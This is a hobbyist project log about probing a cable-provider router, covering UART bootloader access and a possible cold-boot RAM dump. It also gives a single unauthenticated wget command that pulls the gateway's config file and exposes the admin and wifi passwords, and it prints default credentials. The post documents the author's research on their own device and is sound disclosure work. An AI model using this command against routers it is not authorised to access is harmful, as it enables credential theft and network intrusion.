Project Logs

Collapse

• uart commandline

  rawe • 01/21/2015 at 22:20 • 0 comments

  finally I've got a unit the cable provider does not want back, so it is time to open it up and check for the two UART interfaces.. One UART interface provides bootloader access, the other one linux /dev/ttyS0. There is one SPI flash of 1megabyte, one parallel nand flash chip and one DDR ram chip.

  <insert pic here>

  the linux login does not work (admin/admin), as the session terminates immediately after login.
  

  It is not possible to dump the flash content by the bootloader as the memory dump function only handles addresses 0x80000000 and up. Fortunately the boot images seem to get loaded into this address space during bootup which may make the system cold-boot-attackable. E.g. power up the device, reset it and then dump the RAM contents. As this takes ages to dump megabytes of data over uart, here is just the stirngs command on the first few dumped kilobytes after 0x80000000 to prove that it is at least possible to get some useful data out of this:

  !@        
   @T@
  b4BM
  Bldr
  2.4.0alpha18p1
  Bldr
  LVGbootloader
  image1
  image2
  linux
  linuxapps
  permnv
  dhtml
  dynnv
  linuxkfs
  ...
  

  (these strings are used by the bootloader for the flash partition overview table printed on startup).

  Next steps are to check the available address space (too high addresses crash the unit). If it is possible to address 128megabytes after 0x80000000 the real physical memory is mapped to these addresses.

  from linux bootlog:

  [ 21.310000] Serial: BCM63XX driver $Revision: 1.4 $

• dump admin and wifi password from LAN

  rawe • 11/25/2014 at 20:11 • 0 comments

  just do a

  wget -q -O - http://192.168.0.1/goform/system/GatewaySettings.bin | strings

  and receive

  8021
  !UPC1386571
      *    +
      SKKMRPXP
      27354285
      Broadcom
      Broadcom
  TechnicolorAP
  123456
  #0x000102030405060708090A0B0C0D0EBB
  0000001
  CDP.
  RG..
  admin
  Technicolor
  clock.via.net
  ntp.nasa.gov
  tick.ucla.edu
  FIRE
  T802
  UPC1386571
  2.4G
  UPC0118016
      SKKMRPXP
      EZXRXZZE
  THOMSON
  THOMSON
      SKKMRPXP
  THOMSON
  THOMSON
  THOMSON
  UPC.
  <Admin
  MLog
  admin
  admin
  

  The last two lines are the admin login (user admin, password admin). I leave them set to their default config, because it does not increase security to change them...

  The wireless name is UPC1386571 and the password SKKMRPXP:

  Cell 08 - Address: 8C:04:FF:*:*:*
      Channel:11
      Frequency:2.462 GHz (Channel 11)
      Quality=54/70  Signal level=-56 dBm  
      Encryption key:on
      ESSID:"UPC1386571"
      Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 18 Mb/s
        24 Mb/s; 36 Mb/s; 54 Mb/s
      Bit Rates:6 Mb/s; 9 Mb/s; 12 Mb/s; 48 Mb/s
      Mode:Master
      Extra:tsf=00000008198c21d5
      Extra: Last beacon: 220ms ago
      IE: IEEE 802.11i/WPA2 Version 1
          Group Cipher : TKIP
          Pairwise Ciphers (2) : CCMP TKIP
          Authentication Suites (1) : PSK
      IE: WPA Version 1
          Group Cipher : TKIP
          Pairwise Ciphers (2) : CCMP TKIP
          Authentication Suites (1) : PSK

  There is no way to disable wireless (or edit the password) because I am greeted with the error message

  The connection to the server was reset while the page was loading.

  if I try to access the "Wireless" settings tab in the web UI. It is not possible to edit the dumped config file and write it back, because this is broken in current software.

  De facto, anyone who figures out the algorithm that calcs the wifi password based on... well most propably just the MAC address or something other visible from the outside... can access my wireless network which I never activated (btw. internet was ordered WITHOUT wifi, because they want extra money for it!). If the wifi password is truely "random", the password is still only 8 digits only uppercase letters from which only E S P K M R X Z were observed so far (only 8!).

  It is time to wrap that device in aluminium foil...
  

  Edit: told you so... http://derstandard.at/2000028921659/UPC-Standard-WLAN-Passwoerter-kinderleicht-zu-knacken

  I am sure TechnicolorAP / 123456 and the other strange strings are other login credentials, maybe used for telnet (did not try this on the internet connected/KabelBW provided unit):

  Trying 192.168.100.1...
  Connected to 192.168.100.1.
  Escape character is '^]'
  
  Broadcom Corporation Embedded BFC Telnet Server (c) 2000-2008
  
  WARNING: Access allowed by authorized users only.
  
  Login:

  other source for CSRF Vulnerabilities: https://www.nerdbox.it/technicolor-tc7200-multiple-csrf-vulnerabilities/

View all 2 project logs